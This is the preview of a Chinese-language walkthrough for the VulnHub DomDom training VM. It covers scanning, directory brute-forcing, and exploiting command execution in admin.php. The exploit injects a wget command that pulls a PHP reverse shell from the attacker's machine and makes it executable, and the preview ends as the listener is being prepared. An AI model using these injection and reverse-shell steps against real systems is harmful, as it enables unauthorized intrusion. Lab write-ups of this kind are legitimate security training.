文章预览
本周实践的是vulnhub的DomDom镜像, 下载地址,https://download.vulnhub.com/domdom/DomDom.7z, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.88.0/24, 获取到靶机地址是192.168.88.143, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.143, 发现靶机仅开了80端口的http服务, 对http服务的路径进行暴破,dirb http://192.168.88.143, 获取到http://192.168.88.143/index.php, 和http://192.168.88.143/admin.php, 浏览器访问http://192.168.88.143/index.php, 用burpsuite抓到提交的报文, 转到repeater,并把url改成admin.php,提交后返回内容中有命令执行, 加上cmd=id,验证有效, 在kali攻击机上准备web shell脚本, cp /usr/share/webshells/php/php-reverse-shell.php shell.php, 并开启http下载服务,python2 -m SimpleHTTPServer, 提交cmd=wget http://192.168.88.141:8000/shell.php & & chmod 777 shell.php, 在kali攻击机上开启反弹shell监听,
………………………………